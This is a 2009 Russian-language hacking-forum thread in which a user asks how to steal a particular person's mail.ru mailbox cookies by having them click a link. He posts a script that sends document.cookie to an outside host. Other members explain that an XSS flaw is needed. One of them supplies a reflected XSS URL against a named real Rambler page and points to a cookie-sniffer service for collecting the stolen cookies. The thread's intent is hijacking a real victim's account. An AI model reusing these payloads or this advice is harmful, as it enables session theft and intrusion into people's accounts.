Кража куки через клик по ссылке |
04.05.2009, 21:25
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами:
8965761
Репутация:
6
|
|
Кража куки через клик по ссылке
если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает! |
|
|
04.05.2009, 21:27
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
В общем случае куки можно получить только в рамках одного домена.
|
|
|
|
04.05.2009, 21:38
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами:
8965761
Репутация:
6
|
|
смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!
|
|
|
|
04.05.2009, 21:44
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
С нами:
10449962
Репутация:
66
|
|
не будут
|
|
|
|
04.05.2009, 21:46
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами:
8965761
Репутация:
6
|
|
так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!
|
|
|
|
04.05.2009, 21:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Ты, видимо, не понимаешь, что куки без xss не своруешь.
|
|
|
|
04.05.2009, 22:02
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами:
8965761
Репутация:
6
|
|
та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!
|
|
|
|
14.06.2009, 03:33
|
|
Участник форума
Регистрация: 25.05.2008
Сообщений: 201
С нами:
9453915
Репутация:
296
|
|
Сообщение от LemoTTT
та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!
долбаёп, хсс нужны, без них никак 
вот пример на рамблере 
Код:
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert(document.cookie)</script>
alert(document.cookie) - это значит, чтобы мы увидили куки, ну и осталось тока сделать, чтобы они записывалисы в снифер, вот нормальный http://kanick.ru/sniffer/
p.s. удачи в хеке  и почитай вот это http://forum.antichat.ru/thread20140.html
Последний раз редактировалось DIMON4G; 14.06.2009 в 03:38..
|
|
|
|
04.05.2009, 22:28
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.
|
|
|
|
04.05.2009, 22:40
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами:
8965761
Репутация:
6
|
|
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
